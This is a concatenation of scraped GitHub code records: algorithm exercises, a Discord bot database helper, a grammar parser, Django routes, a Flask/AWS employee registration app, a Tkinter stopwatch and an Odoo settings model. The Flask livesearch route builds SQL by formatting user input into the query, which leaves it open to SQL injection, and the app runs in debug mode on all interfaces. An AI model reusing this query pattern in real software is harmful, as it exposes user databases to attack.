merge_point.next是新合并进来的结点\n merge_point.next = h1\n h1 = h1.next\n len1 -= 1\n else:\n merge_point.next = h2\n h2 = h2.next\n len2 -= 1\n merge_point = merge_point.next\n # 如果一个已排好,另一个有剩余,剩下的都是大的,直接加在末尾\n if len1:\n merge_point.next = h1\n else:\n merge_point.next = h2\n # 为下一次合并做准备,将merge_point移到本次合并链表的末尾\n while len1 > 0 or len2 > 0:\n merge_point = merge_point.next\n len1 -= 1\n len2 -= 1\n merge_point.next = cur\n # 合并规模增大一倍\n intv *= 2\n return sen.next\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"TianhengZhao/LeetCode","sub_path":"[148]排序链表.py","file_name":"[148]排序链表.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14640522072","text":"import pymongo\nimport config\n\ndb_uri = config.get(\"DB_URI\")\nclient = pymongo.MongoClient(db_uri)\n\n\ndef set_voice_channel(guild_id: int, voice_channel_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"voice_channel_id\": voice_channel_id}},\n upsert=True)\n\n\ndef set_message_channel(guild_id: int, message_channel_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"message_channel_id\": message_channel_id}},\n upsert=True)\n\n\ndef get_channels(guild_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n return collection.find_one({\"guild_id\": guild_id, \"voice_channel_id\": {\"$ne\": 0}, \"message_channel_id\": {\"$ne\": 0}})\n\n\ndef set_time_delta(guild_id: int, time_delta: int):\n db = client[\"discord\"]\n collection = db[\"time_delta\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"time_delta\": int(time_delta)}},\n upsert=True)\n\n\ndef get_time_delta(guild_id: int):\n db = client[\"discord\"]\n collection = db[\"time_delta\"]\n return (collection.find_one({\"guild_id\": guild_id}))[\"time_delta\"]\n","repo_name":"ThatSongKim/check-io-discord-bot","sub_path":"server_info.py","file_name":"server_info.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35344561680","text":"import sys\nsys.setrecursionlimit(60)\ntable = [[\"0\", \"\", \"3\", \"\", \"6\"], [\"\", \"1\", \"\", \"5\", \"\"], [\"\", \"\", \"\",\n \"4\", \"\"], [\"0\", \"\", \"3\", \"\", \"7\"], [\"\", \"2\", \"\", \"5\", \"\"], [\"\", \"2\", ]]\n\n\ndef first(string):\n first_ = set()\n if string in non_terminals:\n alternatives = productions_dict[string]\n\n for alternative in alternatives:\n first_2 = first(alternative)\n first_ = first_ | first_2\n\n elif string in terminals:\n first_ = {string}\n\n elif string == '' or string == '@':\n first_ = {'@'}\n\n else:\n first_2 = first(string[0])\n if '@' in first_2:\n i = 1\n while '@' in first_2:\n #print(\"inside while\")\n\n first_ = first_ | (first_2 - {'@'})\n #print('string[i:]=', string[i:])\n if string[i:] in terminals:\n first_ = first_ | {string[i:]}\n break\n elif string[i:] == '':\n first_ = first_ | {'@'}\n break\n first_2 = first(string[i:])\n first_ = first_ | first_2 - {'@'}\n i += 1\n else:\n first_ = first_ | first_2\n\n #print(\"returning for first({})\".format(string),first_)\n return first_\n\n\ndef follow(nT):\n #print(\"inside follow({})\".format(nT))\n follow_ = set()\n #print(\"FOLLOW\", FOLLOW)\n prods = productions_dict.items()\n if nT == starting_symbol:\n follow_ = follow_ | {'$'}\n for nt, rhs in prods:\n #print(\"nt to rhs\", nt,rhs)\n for alt in rhs:\n for char in alt:\n if char == nT:\n following_str = alt[alt.index(char) + 1:]\n if following_str == '':\n if nt == nT:\n continue\n else:\n follow_ = follow_ | follow(nt)\n else:\n follow_2 = first(following_str)\n if '@' in follow_2:\n follow_ = follow_ | follow_2-{'@'}\n follow_ = follow_ | follow(nt)\n else:\n follow_ = follow_ | follow_2\n #print(\"returning for follow({})\".format(nT),follow_)\n return follow_\n\n\nterminals = [\"id\", \"+\", \"*\", \"(\", \")\", \"$\"]\nnon_terminals = [\"E\", \"P\", \"T\", \"G\", \"F\"]\n\nstarting_symbol = \"$\"\nproductions = [\"E->TP\", \"P->+TP\", \"P->?\",\n \"T->FG\", \"G->*FG\", \"G->?\", \"F->id\", \"F->(E)\"]\n\nproductions_dict = {}\n\nfor nT in non_terminals:\n productions_dict[nT] = []\n\nfor production in productions:\n nonterm_to_prod = production.split(\"->\")\n alternatives = nonterm_to_prod[1].split(\"/\")\n for alternative in alternatives:\n productions_dict[nonterm_to_prod[0]].append(alternative)\n\nFIRST = {}\nFOLLOW = {}\n\nfor non_terminal in non_terminals:\n FIRST[non_terminal] = set()\n\nfor non_terminal in non_terminals:\n FOLLOW[non_terminal] = set()\n\n# print(\"FIRST\",FIRST)\n\nfor non_terminal in non_terminals:\n FIRST[non_terminal] = FIRST[non_terminal] | first(non_terminal)\n\n# print(\"FIRST\",FIRST)\n\n\nFOLLOW[starting_symbol] = FOLLOW[starting_symbol] | {'$'}\nfor non_terminal in non_terminals:\n FOLLOW[non_terminal] = FOLLOW[non_terminal] | follow(non_terminal)\n\n#print(\"FOLLOW\", FOLLOW)\n\nprint(\"{: ^20}{: ^20}{: ^20}\".format('Non Terminals', 'First', 'Follow'))\nfor non_terminal in non_terminals:\n print(\"{: ^20}{: ^20}{: ^20}\".format(non_terminal, str(\n FIRST[non_terminal]), str(FOLLOW[non_terminal])))\n","repo_name":"Furqan558/Compiler-Construction-with-python","sub_path":"(task 6a + 6b) CFG and LL1 Parser/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13226996921","text":"from django.urls import path\n\nfrom store_project.tracking import views\n\n\napp_name = \"tracking\"\nurlpatterns = [\n path(\"\", views.test_list, name=\"test_list\"),\n path(\"/\", views.test_detail, name=\"test_detail\"),\n path(\n \"/results/add/\",\n views.test_result_create,\n name=\"test_result_create\"\n ),\n path(\n \"/results/bulk/\",\n views.test_result_bulk,\n name=\"test_result_bulk\",\n ),\n path(\n \"/result-create-form/\",\n views.result_create_form,\n name=\"result_create_form\",\n ),\n]\n","repo_name":"adamchainz/fitness-store","sub_path":"app/store_project/tracking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"3309324686","text":"from flask import Flask, render_template, request, jsonify\nfrom pymysql import connections\nimport os\nimport boto3\nfrom config import *\n\napp = Flask(__name__)\n\nbucket = custombucket\nregion = customregion\n\ndb_conn = connections.Connection(\n host=customhost,\n port=3306,\n user=customuser,\n password=custompass,\n db=customdb\n\n)\noutput = {}\ntable = 'employee'\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n return render_template('registration.html')\n\n\n\n# register page - sign up button\n@app.route(\"/registraion\", methods=['POST'])\ndef AddEmp():\n emp_id = request.form['emp_id']\n emp_name = request.form['emp_name']\n emp_email = request.form['emp_email']\n emp_bod = request.form['emp_bod']\n emp_bio = request.form['emp_bio']\n emp_job = request.form['emp_job']\n emp_interest = request.form['emp_interest']\n emp_image_file = request.files['emp_image_file']\n\n insert_sql = \"INSERT INTO employee VALUES (%s, %s, %s, %s, %s, %s, %s)\"\n cursor = db_conn.cursor()\n\n if emp_image_file.filename == \"\":\n return \"Please select a file\"\n\n try:\n\n cursor.execute(insert_sql, (emp_id, emp_name, emp_email, emp_bod, emp_bio, emp_job, emp_interest))\n db_conn.commit()\n # emp_name = \"\" + first_name + \" \" + last_name\n # Uplaod image file in S3 #\n emp_image_file_name_in_s3 = \"emp-id-\" + str(emp_id) + \"_image_file\"\n s3 = boto3.resource('s3')\n\n try:\n print(\"Data inserted in MySQL RDS... uploading image to S3...\")\n s3.Bucket(custombucket).put_object(Key=emp_image_file_name_in_s3, Body=emp_image_file)\n bucket_location = boto3.client('s3').get_bucket_location(Bucket=custombucket)\n s3_location = (bucket_location['LocationConstraint'])\n\n if s3_location is None:\n s3_location = ''\n else:\n s3_location = '-' + s3_location\n\n object_url = \"https://s3{0}.amazonaws.com/{1}/{2}\".format(\n s3_location,\n custombucket,\n emp_image_file_name_in_s3)\n\n except Exception as e:\n return str(e)\n\n finally:\n cursor.close()\n\n print(\"all modification done...\")\n return render_template('registerSuccess.html', name=emp_name)\n\n\n# register page - search employee button\n@app.route(\"/searchEmpButton\", methods=['POST'])\ndef search():\n return render_template('searchEmp.html')\n\n\n# register success page - back button\n@app.route(\"/registerSuccess\", methods=['POST'])\ndef back1():\n return render_template('registration.html')\n\n\n\n\n# search emp page - search emp function to search\n@app.route(\"/livesearch\", methods=[\"POST\", \"GET\"])\ndef livesearch():\n searchbox = request.form.get(\"text\")\n cursor = db_conn.cursor()\n query = \"select * from employee where emp_id LIKE '%{}%' OR emp_name LIKE '%{}%' \".format(searchbox, searchbox)#This is just example query , you should replace field names with yours\n cursor.execute(query)\n result = cursor.fetchall()\n return jsonify(result)\n\n\n# search emp page - back button\n@app.route(\"/backButton\", methods=['POST'])\ndef back2():\n return render_template('registration.html')\n\n\n\n\n# employee details page - show employee details\n@app.route(\"/empDetails\", methods=['POST'])\ndef back3():\n return render_template('')\n\n# employee details page - back button\n@app.route(\"/backToRegisterButton\", methods=['POST'])\ndef back():\n return render_template('registration.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"elenavanilla/aws-live","sub_path":"EmpAppAss.py","file_name":"EmpAppAss.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"376721837","text":"from mri.src.iomethods import load_documents, load_queries\nfrom mri.src.mri import IRM\nfrom mri.src.document import Document\nfrom typing import List, Tuple\n\n\nclass MriController:\n CISI = 'CISI'\n CRAN = 'CRAN'\n\n def _init_db(self, dataset: str):\n self._documents = load_documents(path='./mri/datasets/', dataset=self.CISI)\n self._queries = load_queries(path='./mri/datasets/', dataset=self.CISI)\n self.current_dataset = dataset\n self._model = IRM()\n for d in self._documents:\n self._model.add(d)\n\n def __init__(self, datasets: List[str] = None):\n self.datasets = [self.CISI, self.CRAN] if datasets is None else datasets\n self._model = None\n self._roccio_activated = False\n self._init_db(self.CISI)\n\n def change_dataset(self, name: str = CRAN):\n if name in self.datasets:\n self._init_db(name)\n return len(self._documents)\n return 0\n\n def execute_query(self, query: str) -> List[Document]:\n rank: List[Tuple[int, int]] = self._model.run_query(\n query, roccio=self._roccio_activated, top=5\n )\n return list(map(lambda e: (self._documents[e[0]]), rank))\n\n def get_document_json(self, id: str):\n for d in self._documents:\n if d.id == id:\n return d.toJson()\n return None\n\n def set_roccio(self, activated=True):\n self._roccio_activated = activated\n","repo_name":"tlr-team/srifinder_bot","sub_path":"src/mri_controller.py","file_name":"mri_controller.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28618566377","text":"with open(\"1_fuel_inputs.txt\", \"r\") as f:\n inputs = list(map(int, f.read().split()))\n\n\ndef mass_to_fuel(mass: int) -> int:\n \"\"\"Given the mass of an object, return the fuel requred to move that object.\"\"\"\n return mass // 3 - 2\n\n\nif __name__ == \"__main__\":\n print(sum(mass_to_fuel(x) for x in inputs))\n","repo_name":"fisher60/advent-of-code","sub_path":"2019/1_fuel_required.py","file_name":"1_fuel_required.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3523903293","text":"import os\nimport cv2\nimport numpy as np\nimport pickle\nfrom random import shuffle\n\n\ndef main():\n # Define parameters\n images_output_location = 'dataset/icons_dataset.npy'\n img_size = 32\n images_dir = 'dataset/LLD-icons-files/LLD_favicons_clean_png/'\n images = os.listdir(images_dir)\n\n # Define two lists - one for the images and one for the labels\n images_dataset = []\n\n # For each image in images_dir\n print('Loading images...')\n for curr_img in images:\n # Load it\n path = os.path.join(images_dir, curr_img)\n img = cv2.imread(path)\n # Append the image to the list of images\n images_dataset.append(img)\n print('Finished')\n\n # Transform the images_dataset list into numpy array\n print('Reshaping the images...')\n images_dataset = np.array(images_dataset).reshape(-1, img_size, img_size, 3)\n print('Finished')\n\n # Shuffle the images\n print('Shuffling the images...')\n shuffle(images_dataset)\n\n # Serialize the images\n print('Starting image serialization...')\n np.save(images_output_location, images_dataset)\n print('Finished')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rozver/Calliope","sub_path":"CalliopeAPI/preprocess_dataset.py","file_name":"preprocess_dataset.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"19704178153","text":"from tkinter import *\r\nfrom classes import *\r\n#from inves import *\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport time\r\nfrom pprint import pprint\r\n\r\nclass question:\r\n def __init__(self, answer, time, clock_time):\r\n self._time =time\r\n self._clock = clock_time\r\n self._answer = answer\r\n\r\n def get_time(self):\r\n return self._time\r\n def get_clock(self):\r\n return self._clock\r\n def get_answer(self):\r\n return self._answer\r\n\r\nscope = [\"https://spreadsheets.google.com/feeds\",'https://www.googleapis.com/auth/spreadsheets',\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"psycho-answers-db-2c81628245d3.json\", scope)\r\nclient = gspread.authorize(creds)\r\nsheet = client.open(\"psycho-answers\").sheet1\r\ndata = sheet.get_all_records()\r\n\r\nglobal count\r\nglobal optionvar_moed\r\nglobal optionvar_subject\r\nglobal optionvar_ch_num\r\ncount = False\r\n\r\nglobal q_num\r\nq_num = 1\r\n#פונקציות כתיבת זמנים בטבלה\r\ndef write_question_time(arg=0):\r\n global q_num\r\n current_text = str(t.get())\r\n globals()[\"q_clock_%s\"%q_num] = str(t.get())\r\n if q_num == 1:\r\n m, s = map(int, current_text.split(\":\"))\r\n m = int(m)\r\n s = int(s)\r\n if m < 10 :\r\n m = str(0) + str(m)\r\n else :\r\n m = str(m)\r\n if s < 10 :\r\n s = str(0) + str(s)\r\n else :\r\n s = str(s)\r\n current_text = m + \":\" + s\r\n q_times.append(current_text)\r\n q_clocks.append(current_text)\r\n globals()[\"lb_question_time_%s\"%q_num] = Label (root, text = current_text)\r\n globals()[\"lb_question_clock_%s\"%q_num] = Label (root, text = current_text)\r\n globals()[\"lb_question_time_%s\" % q_num].place(x =75, y=((q_num-1)*40)+242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x =140, y=((q_num-1)*40)+242)\r\n q_num += 1\r\n else:\r\n string_time = calculate_question_time(globals()[\"q_clock_%s\" %q_num], globals()[\"q_clock_%s\" %(q_num - 1)])\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=string_time)\r\n globals()[\"lb_question_clock_%s\"%q_num] = Label (root, text = current_text)\r\n q_times.append(string_time)\r\n q_clocks.append(current_text)\r\n if q_num <= 10 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=140, y=((q_num - 1) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=75, y=((q_num - 1) * 40) + 242)\r\n if q_num > 10 and q_num <= 20 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=335, y=((q_num - 11) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=272, y=((q_num - 11) * 40) + 242)\r\n if q_num > 20 and q_num <= 23 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=530, y=((q_num - 21) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=462, y=((q_num - 21) * 40) + 242)\r\n q_num += 1\r\n time = q_clocks[q_num-2]\r\n clock_time = str(t.get())\r\ndef calculate_question_time(new_q, former_q):\r\n new_m, new_s = map(int, new_q.split(\":\"))\r\n new_m = int(new_m)\r\n new_s = int(new_s)\r\n former_m, former_s = map(int, former_q.split(\":\"))\r\n former_m = int(former_m)\r\n former_s = int(former_s)\r\n if (new_s-former_s) < 0:\r\n seconds = new_s + (60-former_s)\r\n minutes = new_m - (former_m + 1)\r\n else:\r\n seconds = new_s - former_s\r\n minutes = new_m - former_m\r\n if minutes < 10 :\r\n m = str(0) + str(minutes)\r\n else :\r\n m = str(minutes)\r\n if seconds < 10 :\r\n s = str(0) + str(seconds)\r\n else :\r\n s = str(seconds)\r\n globals()[\"q_time_%s\"%q_num] = \"{}:{}\".format(m,s)\r\n return \"{}:{}\".format(m,s)\r\n#פונקציות טיימר\r\ndef reset():\r\n global count\r\n global q_num\r\n global q_clocks\r\n global q_times\r\n q_clocks.clear()\r\n q_times.clear()\r\n q_clocks = [0]\r\n q_times = [0]\r\n count = True\r\n t.set(\"00:00\")\r\n q_num = 1 #משתנה שסופר את מספר השאלה עבור כל התוכנה. מתאפס בריסט וגדל ב-1 בגל question\r\n for i in range(1,24):\r\n if q_num <= 10 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=75, y=((q_num-1) * 40) + 242)\r\n if q_num > 10 and q_num <= 20 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x =270, y=((q_num-11)*40)+242)\r\n if q_num > 20 and q_num <= 23 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=462, y=((q_num - 21) * 40) + 242)\r\n q_num += 1\r\n q_num = 1\r\ndef start(arg=0):\r\n global count\r\n count = False\r\n start_timer()\r\ndef start_timer():\r\n global count\r\n timer()\r\ndef stop(arg=0):\r\n global count\r\n count = True\r\ndef timer():\r\n global count\r\n if count == False:\r\n d = str (t.get())\r\n m, s = map(int, d.split(\":\"))\r\n m= int(m)\r\n s = int(s)\r\n if s < 59:\r\n s += 1\r\n elif s==59:\r\n s = 0\r\n if m < 59:\r\n m += 1\r\n elif m == 59:\r\n m = 0\r\n if m < 10:\r\n m = str(0) + str(m)\r\n else:\r\n m= str(m)\r\n if s < 10:\r\n s = str(0) + str(s)\r\n else:\r\n s= str(s)\r\n d =m+\":\"+s\r\n t.set(d)\r\n if count == False:\r\n root.after(1000, start_timer)\r\n#פונקציות GUI\r\ndef creat_root_tk():\r\n create_main_page_table()\r\n root.title(\"stop watch\")\r\n root.geometry(\"600x800\")\r\n root.resizable(False, False)\r\n root.bind(\"\", write_question_time)\r\n root.bind(\"\", stop)\r\n lb_stopwatch = Label(root, textvariable=t)\r\n lb_stopwatch.config(font=(\"Courier 40 bold\"))\r\n bt_start = Button(root, text=\"התחל\", command=start, font=(\"Aharoni 12\"), bg=\"honeydew3\", fg=\"white\")\r\n bt_stop = Button(root, text=\"עצור\", command=stop, font=(\"Aharoni 12 bold\"), bg=\"red\", fg=\"white\")\r\n bt_reset = Button(root, text=\"איפוס\", command=reset, font=(\"Aharoni 12 bold\"), bg=\"honeydew3\", fg=\"white\")\r\n lb_stopwatch.place(x=210, y=10)\r\n bt_start.place(x=150, y=100)\r\n bt_stop.place(x=265, y=100)\r\n bt_reset.place(x=390, y=100)\r\n bt_loop = Button(root, text=\"שאלה\", command=write_question_time, font=(\"Aharoni 12 bold\"), bg=\"grey\", fg=\"white\")\r\n bt_loop.place(x=260, y=136)\r\n lb_titles = Label(root,\r\n text=\"זמן זמן זמן זמן זמן זמן\")\r\n lb_titles.config(font=(\"Timesnewroman 8\"))\r\n lb_titles.place(x=80, y=193)\r\n lb_titles1 = Label(root,\r\n text=\"שאלה שעון שאלה שעון שאלה שעון\")\r\n lb_titles1.config(font=(\"Timesnewroman 8\"))\r\n lb_titles1.place(x=77, y=210)\r\n question_count_lb = 1\r\n question_count_lb_text = str(question_count_lb) + \".\"\r\n for i in range(1, 4) :\r\n for j in range(1, 11) :\r\n if question_count_lb < 24 :\r\n lb_question_number = Label(root, text=question_count_lb_text)\r\n lb_question_number.config(font=(\"Timesnewroman 14 bold\"))\r\n lb_question_number.place(x=180 * (i - 1) + 40, y=(j * 40) + 200)\r\n question_count_lb += 1\r\n question_count_lb_text = str(question_count_lb) + '.'\r\n bt_open_inves = Button(root, text = \"עבור לתחקור פרק\", command = create_inves_tk, bg = \"navyblue\", fg=\"white\")\r\n bt_open_inves.place (x=240, y=650)\r\ndef create_main_page_table():\r\n bt_canvas = Canvas(root, width = 600, height = 800)\r\n bt_canvas.pack()\r\n #יוצר את הקווים התחתונים מתחת לכותרת\r\n table = bt_canvas.create_line(76, 230, 102, 230)\r\n table = bt_canvas.create_line(140, 230, 171, 230)\r\n table = bt_canvas.create_line(272, 230, 301, 230)\r\n table = bt_canvas.create_line(335, 230, 371, 230)\r\n table = bt_canvas.create_line(462, 230, 492, 230)\r\n table = bt_canvas.create_line(530, 230, 562, 230)\r\n\r\n #יוצר את שלוש השורות הראשונות\r\n table = bt_canvas.create_line(33,275,575,275)\r\n table = bt_canvas.create_line(33, 315, 575, 315)\r\n table = bt_canvas.create_line(33, 355, 575, 355)\r\n #יוצר את השורות של כל שאר השורות\r\n for i in range(1, 8) :\r\n table = bt_canvas.create_line(33, 355+(40*i), 390, 355+(40*i))\r\n#דף תחקור\r\ndef create_inves_tk() :\r\n global optionvar_moed\r\n global optionvar_subject\r\n global optionvar_ch_num\r\n inves = Tk()\r\n scrollbar = Scrollbar(inves)\r\n scrollbar.pack(side=RIGHT, fill=Y)\r\n inves_canvas = Canvas(inves, width=600, height=300, yscrollcommand = scrollbar.set)\r\n inves_canvas.pack(anchor= \"nw\")\r\n inves.title(\"תחקור פרק\")\r\n inves.geometry(\"600x800\")\r\n inves.resizable(True, True)\r\n lb_koteret_inves = Label(inves, text=\"תחקור פרק\")\r\n lb_koteret_inves.config(font=\"Courier 32 bold underline\")\r\n lb_koteret_inves.place(x=160, y=7)\r\n answer_lines_count = 1\r\n inves_canvas.create_line(575, 115, 275, 115)\r\n inves_canvas.create_line(575, 115, 575, 266)\r\n lb_koteret_table_inves = Label(inves, text=\":נא מלא את התשובות בטבלה\")\r\n lb_koteret_table_inves.config(font=\"Gisha 11\")\r\n lb_koteret_table_inves.place(x=392, y=90)\r\n\r\n\r\n for i in range(1, 6) :\r\n inves_canvas.create_line(575, 115 + i * 30, 275, 115 + i * 30)\r\n inves_canvas.create_line(575 - i * 60, 115, 575 - i * 60, 266)\r\n for j in range(1, 6) :\r\n if answer_lines_count <= 23 :\r\n string = \":\" + str(answer_lines_count)\r\n lb_q_num_ans = Label(inves, text=string)\r\n lb_q_num_ans.place(x=550 - (i - 1) * 60, y=120 + (j - 1) * 30)\r\n globals()[\"entry_q_%s\" % answer_lines_count] = Entry(inves, width=2)\r\n globals()[\"entry_q_%s\" % answer_lines_count].place(x=530 - (i - 1) * 60, y=120 + (j - 1) * 30)\r\n answer_lines_count += 1\r\n globals()[\"entry_q_%s\" % answer_lines_count] = Entry(inves, width=2)\r\n globals()[\"entry_q_%s\" % answer_lines_count].place(x=600, y=700)\r\n \"\"\"\r\n for i in range(23):\r\n try:\r\n string = \"{} -{}\".format(q_times[i],str(i+1))\r\n lb_q_inves_times = Label(inves, text = string)\r\n lb_q_inves_times.place(x=550, y=(i+1)*20)\r\n except IndexError:\r\n break\r\n inves.mainloop()\r\n \"\"\"\r\n inves.bind(\"1\", focus_next_widget)\r\n inves.bind(\"2\", focus_next_widget)\r\n inves.bind(\"3\", focus_next_widget)\r\n inves.bind(\"4\", focus_next_widget)\r\n bt_clear_table = Button (inves, text = \"נקה טבלה\", font=(\"Aharoni 12 bold\"), command = clear_table_inves)\r\n bt_clear_table.place(x=200, y=240)\r\n Label(inves, text=\":ציין את מקור הפרק לתחקור\", font = \"Gisha 10\").place(x= 85, y=100)\r\n optionvar_moed = StringVar(inves)\r\n optionvar_moed.set(\"בחר מועד\")\r\n option_moed = OptionMenu(inves, optionvar_moed, \"דצמבר/חורף 19\", \"ספטמבר/סתיו 19\", \"יולי/קיץ 19\", \"אפריל/אביב 19\")\r\n option_moed.place(x=130, y=140, anchor = \"center\")\r\n optionvar_subject = StringVar(inves)\r\n optionvar_subject.set(\"בחר נושא פרק\")\r\n option_subject = OptionMenu(inves, optionvar_subject, \"כמותי\", \"מילולי\", \"אנגלית\")\r\n option_subject.place(x=130, y=170, anchor = \"center\")\r\n optionvar_ch_num = StringVar(inves)\r\n optionvar_ch_num.set(\"בחר מספר פרק\")\r\n option_ch_num = OptionMenu(inves, optionvar_ch_num, \"ראשון\", \"שני\")\r\n option_ch_num.place(x=130, y=200, anchor = \"center\")\r\n Button(inves, text = \"!התחל תחקור\", bg = \"lawn green\", font = \"Gisha 11 bold\", command = start_inves).place(x= 30, y= 240)\r\ndef focus_next_widget(event):\r\n if not entry_q_24.get():\r\n event.widget.tk_focusNext().focus()\r\n return(\"break\")\r\ndef clear_table_inves():\r\n for i in range (1,25):\r\n\r\n globals()[\"entry_q_%s\"%i].delete(0)\r\ndef start_inves():\r\n global optionvar_moed\r\n global optionvar_subject\r\n global optionvar_ch_num\r\n moed = optionvar_moed.get()\r\n subject = optionvar_subject.get()\r\n ch_num = optionvar_ch_num.get()\r\n for i in range(1,24):\r\n try:\r\n questions.append(question(globals()[\"entry_q_%s\" %i].get(), q_times[i], q_clocks[i]))\r\n except IndexError:\r\n break\r\n is_value_in_cell = True\r\n rows_count = 1\r\n while is_value_in_cell:\r\n if sheet.cell(rows_count,1) != 0:\r\n rows_count += 1\r\n else:\r\n is_value_in_cell = False\r\n print(rows_count)\r\nglobal q_clocks\r\nq_clocks = [0]\r\nglobal q_times\r\nq_times = [0]\r\nglobal questions\r\nquestions = [question(0,0,0)]\r\nq_num = 1\r\nroot = Tk()\r\nt = StringVar()\r\nt.set(\"00:00\")\r\ncreat_root_tk()\r\nroot.mainloop()\r\n","repo_name":"NadavKadosh/Study","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30440963374","text":"'''\nWritten By Ronel B. Llarenas\nGithub.com/llarenas\n'''\n\n#!/usr/bin/python\n# Mini ckient prgram\n# make sure nga ang misiserver.py is running\n\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK__STREAM)\ns.connect(('localhost', 8081))\ns.send('Happy Hacking')\ndata = s.recv(1024) #1024 bytes\ns.close()\nprint ('Received: ')\nprint (data)\n","repo_name":"llarenas/mini-Server-Client-in-Python","sub_path":"miniclient.py","file_name":"miniclient.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36094818821","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\nfrom odoo.modules.module import get_resource_path\nimport base64\nfrom odoo.tools.mimetypes import guess_mimetype\n\n\nclass AnitaUserSetting(models.TransientModel):\n '''\n anita user setting\n '''\n _inherit = 'res.config.settings'\n _inherits = {'anita_theme_setting.setting_base': 'setting_id'}\n\n setting_id = fields.Many2one(\n comodel_name=\"anita_theme_setting.setting_base\",\n required=True,\n ondelete=\"cascade\",\n string=\"setting id\")\n\n theme_setting_mode = fields.Selection(\n string=\"theme style mode\",\n selection=[('system', 'system'),\n ('company', 'company'),\n ('user', 'user')],\n default='system')\n\n allow_debug = fields.Boolean(string=\"allow debug\", default=False)\n\n window_default_title = fields.Char(string=\"login title\", default=\"Funenc\")\n powered_by = fields.Char(string=\"powered by\", default=\"Anita\")\n\n @api.model\n def get_theme_setting(self):\n '''\n get the theme setting, it is usefull when the mode is system\n :return:\n '''\n return self.get_theme_values()\n\n @api.model\n def get_theme_setting_mode(self):\n '''\n get theme setting mode\n :return:\n '''\n config = self.env['ir.config_parameter'].sudo()\n theme_setting_mode = config.get_param(\n key='anita_theme_setting.theme_setting_mode', default='system')\n return theme_setting_mode\n\n @api.model\n def get_values(self):\n '''\n get the vuales\n :return:\n '''\n res = super(AnitaUserSetting, self).get_values()\n theme_values = self.get_theme_values()\n # get the favicon\n res.update(theme_values)\n\n return res\n\n @api.model\n def get_theme_values(self):\n '''\n get the theme values\n :return:\n '''\n config = self.env['ir.config_parameter'].sudo()\n\n layout_mode = config.get_param(key='anita_theme_setting.layout_mode', default='Layout1')\n login_style = config.get_param(key='anita_theme_setting.login_style', default='login_style1')\n theme_setting_mode = config.get_param(key='anita_theme_setting.theme_setting_mode', default='system')\n current_theme_mode = config.get_param(key='anita_theme_setting.current_theme_mode', default=False)\n current_theme_style = config.get_param(key='anita_theme_setting.current_theme_style', default=False)\n dialog_pop_style = config.get_param(key=\"anita_theme_setting.dialog_pop_style\", default='normal')\n button_style = config.get_param(key=\"anita_theme_setting.button_style\", default='btn-style-normal')\n control_panel_mode = config.get_param(key=\"anita_theme_setting.control_panel_mode\", default='mode1')\n table_style = config.get_param(key=\"anita_theme_setting.table_style\", default='normal')\n font_name = config.get_param(key=\"anita_theme_setting.font_name\", default='Roboto')\n show_app_name = config.get_param(key=\"anita_theme_setting.show_app_name\", default=True)\n rtl_mode = config.get_param(key=\"anita_theme_setting.rtl_mode\", default=False)\n favorite_mode = config.get_param(key=\"anita_theme_setting.favorite_mode\", default=False)\n allow_debug = config.get_param(key=\"anita_theme_setting.allow_debug\", default=True)\n window_default_title = 